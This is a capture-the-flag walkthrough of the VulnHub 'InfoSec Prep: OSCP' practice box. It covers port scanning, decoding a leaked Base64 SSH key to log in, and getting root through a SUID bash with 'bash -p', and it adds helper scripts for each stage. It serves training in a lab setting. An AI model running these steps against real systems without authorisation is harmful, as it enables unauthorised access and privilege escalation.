This is a walk-through of how to exploit a computer system. Please note that some of the techniques described are illegal if you are not authorized to use them on the target machine.
The target is the "InfoSec Prep: OSCP" box on VulnHub, which is a site that offers machines for you to practice hacking.
0) Background
The box was created by FalconSpy, and used in a contest for a prize giveaway of a 30-day voucher for Offensive Security labs and training materials, and an exam attempt at the OSCP certification. After the launch, Tib3rius donated 20 copies of his Privesc courses for runners-up. The contest was hosted on the InfoSec Prep Discord Server.
I ran Kali Linux as my hacking operating system, but the tools and commands below can be used on other Linux distributions if you install them. Both Kali and the InfoSec Prep box were run as virtual machines using VirtualBox.
If you have any questions, or if you see anything below that should be added, changed, or clarified, please contact me on Twitter: https://twitter.com/john_k57
The hack begins by scanning the target system to see which ports are open...
1) Initial scan
sudo nmap -T4 -p- 192.168.0.202
Note: Instead of 192.168.0.202 in these walkthrough steps, use whatever IP address is displayed on the InfoSec Prep box's login screen when you spin it up in VirtualBox.
- sudo runs the command as the root user, which nmap needs for its default SYN scan (raw sockets).
- -T4 selects a timing template from 0 (slowest) to 5 (fastest, but can miss things), so 4 is a good default on a lab network.
- -p- scans all 65535 TCP ports, instead of the default 1000 most common ones.
Nmap results show 3 open ports: 22, 80 and 33060.
2) Detailed scan of open ports
sudo nmap -A -T4 -p22,80,33060 192.168.0.202
- -A does a more thorough scan including version detection and script scanning.
- -p22,80,33060 scans only those 3 ports.
The script scan output lists a suspicious file on the web server, secret.txt:
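The two scans above are one procedure: sweep every port, then run version detection and scripts only against what was open. The following is an added example (not code from the original walkthrough) that chains the two so the port list for the -A scan is read from nmap's grepable output (-oG) instead of being typed by hand. The grepable line at the bottom is a constructed sample of what -oG writes for this box's three ports; scan_target itself is not run in the demo.

```bash
#!/usr/bin/env bash
# Added example, not from the original walkthrough: chaining the two nmap
# steps so the port list for the -A scan is taken from the full sweep.
set -euo pipefail

# Extract open TCP ports from an nmap grepable (-oG) file as "22,80,33060".
# The "Ports:" field holds entries like  22/open/tcp//ssh///  separated by ", ";
# closed or filtered entries are listed the same way and are skipped here.
open_ports() {
  sed -n 's/.*Ports: //p' "$1" \
    | tr ',' '\n' \
    | sed -n 's#^ *\([0-9]*\)/open/tcp/.*#\1#p' \
    | paste -sd, -
}

# Two-stage scan: full sweep as root (SYN scan needs raw sockets), then
# version detection and scripts only on what was open.
scan_target() {
  local target="$1" ports
  sudo nmap -T4 -p- -oG full.gnmap "$target" > /dev/null
  ports=$(open_ports full.gnmap)
  [ -n "$ports" ] || { echo "no open TCP ports found" >&2; return 1; }
  sudo nmap -A -T4 -p "$ports" "$target"
}

# Constructed sample of the -oG output for the box (fields are tab separated).
tmp=$(mktemp)
printf 'Host: 192.168.0.202 ()\tStatus: Up\n' > "$tmp"
printf 'Host: 192.168.0.202 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 33060/open/tcp//mysqlx///\tIgnored State: closed (65532)\n' >> "$tmp"
open_ports "$tmp"     # 22,80,33060
rm -f "$tmp"
```

On a real target call scan_target 192.168.0.202 (or whatever IP the box shows); the full.gnmap file it leaves behind is also handy as a record of the sweep.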
3) Examine suspicious file
wget http://192.168.0.202/secret.txt
cat secret.txt
- cat displays the contents
Or you could visit the URL from the wget command in a browser.
Partial contents of secret.txt: the text uses only the Base64 alphabet (A-Z, a-z, 0-9, + and /), and the "==" at the end is Base64 padding, so it is almost certainly Base64 encoded. (The padding alone is only a hint; the restricted character set is the stronger tell.)
4) Decode file
base64 -d secret.txt > secret.decoded
- > directs the output to a new file, "secret.decoded"
cat secret.decoded
Decoded file contents:
...the first line is -----BEGIN OPENSSH PRIVATE KEY-----, so it's an OpenSSH private key.
5) Use the private key to log in through SSH
ssh refuses a key file that other users can read, so the decoded key must be made readable only by you (mode 600) before it can be used.
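Steps 3 to 5 as reusable shell functions, added here as an example; this is not code from the original walkthrough. The sample at the bottom is a constructed fake key header round-tripped through base64, the target IP is the walkthrough's placeholder, and the username is a placeholder you must supply yourself (the page does not state it).

```bash
#!/usr/bin/env bash
# Added example, not code from the original walkthrough: steps 3-5 as shell
# functions. Sample input is constructed; IP and username are placeholders.
set -euo pipefail

# Return 0 if the file is one Base64 blob: only the Base64 alphabet, length a
# multiple of 4, at most two '=' padding characters and only at the end.
# The "==" tail is a hint, not proof; the alphabet check is the stronger tell.
looks_like_base64() {
  local blob
  blob=$(tr -d '\n\r' < "$1")
  [ $(( ${#blob} % 4 )) -eq 0 ] || return 1
  [[ $blob =~ ^[A-Za-z0-9+/]+={0,2}$ ]]
}

# Decode $1 into $2 and print what the decoded file starts with:
# openssh-private-key, pem-private-key, or unknown (file is left to inspect).
decode_secret() {
  local in="$1" out="$2" first
  base64 -d < "$in" > "$out" 2>/dev/null || { echo not-base64; return 1; }
  first=$(head -n 1 "$out")
  case "$first" in
    '-----BEGIN OPENSSH PRIVATE KEY-----') echo openssh-private-key ;;
    '-----BEGIN '*'PRIVATE KEY-----')     echo pem-private-key ;;
    *)                                     echo unknown ;;
  esac
}

# ssh rejects a key others can read ("UNPROTECTED PRIVATE KEY FILE"), so fix
# the mode first. ssh-keygen -y re-derives the public key (fails on a corrupt
# file); ssh-keygen -l prints the fingerprint and the key's comment, which
# often names the user@host the key was generated for.
prepare_key() {
  chmod 600 "$1"
  ssh-keygen -y -f "$1" > /dev/null
  ssh-keygen -l -f "$1"
}

# Compose the login command; IdentitiesOnly stops ssh from offering every key
# in your agent before the one you want. All three arguments are yours.
ssh_command() {
  printf 'ssh -i %s -o IdentitiesOnly=yes %s@%s\n' "$1" "$2" "$3"
}

# Constructed demo: a fake key body encoded the way secret.txt was.
demo_dir=$(mktemp -d)
printf '%s\n' '-----BEGIN OPENSSH PRIVATE KEY-----' 'constructed, not a real key' \
  '-----END OPENSSH PRIVATE KEY-----' | base64 > "$demo_dir/secret.txt"
if looks_like_base64 "$demo_dir/secret.txt"; then
  decode_secret "$demo_dir/secret.txt" "$demo_dir/secret.decoded"   # openssh-private-key
fi
ssh_command "$demo_dir/secret.decoded" user 192.168.0.202           # "user" is a placeholder
rm -rf "$demo_dir"
```

On the real box run prepare_key on the decoded file before ssh_command; if the key comment names an account, that is the username to try first.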
6) Attempt to get flag
The location of the flag is indicated on VulnHub:
cat /root/flag.txt
But it appears we do not have permission:
7) Privilege escalation
Try the basics first:
sudo su -
...but sudo asks for our own account's password, which we never learned because we logged in with a key instead of a password.
Check for SUID binaries (mode bit 4000, shown as an "s" in the owner's execute position). These run with the effective UID of the file's owner, not of the user who executes them:
find / -perm -u=s -type f 2>/dev/null
Look for binaries known to be abusable for privilege escalation when SUID root, such as bash, cat, cp, echo, find, less, more, nano, nmap, vim and others: https://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/
/usr/bin/bash is on the list!
We can view the permissions (look for the "s" in the owner's execute position, e.g. -rwsr-xr-x, and for root as the owner):
ls /usr/bin/bash -l
- ls lists it
- -l uses the long listing format, which includes permissions
Bash normally drops a setuid effective UID back to the real UID as it starts; the -p option (privileged mode) tells it not to, so the shell keeps the file owner's (root's) effective UID:
bash -p
then to confirm:
whoami
...we have a shell as root! whoami reports the effective user, so it prints root; id will still show our own uid with euid=0(root), which is enough to read /root/flag.txt.
8) Capture the flag
The cat /root/flag.txt from step 6 now succeeds.
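Two parts of the privilege escalation above are easy to get wrong by eye: picking the root-owned, genuinely interesting entries out of a long find listing, and understanding what kind of root the bash -p shell actually is. The following is an added example, not part of the original walkthrough, that triages ls -l output for SUID entries and classifies an id line. The sample ls -l lines and the sample id output are constructed (the user name lowpriv is made up); nothing here touches a real target.

```bash
#!/usr/bin/env bash
# Added example, not part of the original walkthrough: SUID triage and a
# sanity check on the shell that `bash -p` gives you. Samples are constructed.
set -euo pipefail

# Binaries the page's reference calls out as abusable when SUID root.
INTERESTING="bash cat cp echo find less more nano nmap vim"

# Feed `ls -l` lines on stdin, e.g. from
#   find / -perm -u=s -type f -exec ls -l {} + 2>/dev/null
# Prints "<path> <owner> <tag>" for every entry whose owner-execute slot is
# 's' (setuid + exec) or 'S' (setuid set, but the owner has no exec bit).
# Tag is root-suid when root owns it, user-suid otherwise.
# Paths containing spaces are not handled.
suid_lines() {
  local mode links owner rest path
  while read -r mode links owner rest; do
    case "${mode:3:1}" in
      s|S) ;;
      *) continue ;;
    esac
    path=${rest##* }      # the file name is the last field
    if [ "$owner" = root ]; then
      printf '%s %s root-suid\n' "$path" "$owner"
    else
      printf '%s %s user-suid\n' "$path" "$owner"
    fi
  done
}

# Keep only root-SUID entries whose basename is on the INTERESTING list.
# A SUID copy of `find` owned by a regular user is not a root escalation.
suid_triage() {
  local path owner tag name
  suid_lines | while read -r path owner tag; do
    [ "$tag" = root-suid ] || continue
    name=${path##*/}
    case " $INTERESTING " in
      *" $name "*) printf '%s\n' "$path" ;;
    esac
  done
}

# `whoami` reports the effective UID, so it says root even though `bash -p`
# left the real UID as your own; `id` shows that as uid=1000(...) euid=0(root).
# Classify an `id` line: full-root (uid 0), euid-root (the SUID-bash case,
# enough to read /root/flag.txt) or unprivileged.
classify_id() {
  local out="$1" uid euid
  uid=$(printf '%s\n' "$out" | sed -n 's/^uid=\([0-9]*\).*/\1/p')
  euid=$(printf '%s\n' "$out" | sed -n 's/.*euid=\([0-9]*\).*/\1/p')
  if [ "$uid" = 0 ]; then echo full-root
  elif [ "$euid" = 0 ]; then echo euid-root
  else echo unprivileged
  fi
}

# Constructed sample of `ls -l` output for the demo run.
SAMPLE='-rwsr-xr-x 1 root root 1183448 Jun 18  2020 /usr/bin/bash
-rwxr-xr-x 1 root root  138856 Sep  5  2019 /usr/bin/ls
-rwsr-xr-x 1 root root   68208 May 28  2020 /usr/bin/passwd
-rwsr-xr-x 1 lowpriv lowpriv 8464 Jul  4  2020 /home/lowpriv/find
-rwSr--r-- 1 root root    1024 Jul  4  2020 /opt/odd'

printf '%s\n' "$SAMPLE" | suid_triage                                        # /usr/bin/bash
classify_id 'uid=1000(lowpriv) gid=1000(lowpriv) euid=0(root) groups=1000(lowpriv)'   # euid-root
classify_id "$(id)"                                                           # the current shell
```

Running classify_id "$(id)" right after bash -p is the quick way to confirm the escalation worked: euid-root means reads of /root succeed, while whoami alone can mislead you into thinking the real UID changed.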
---------------------------------------------
Here's the entire process beginning-to-end, boot2root: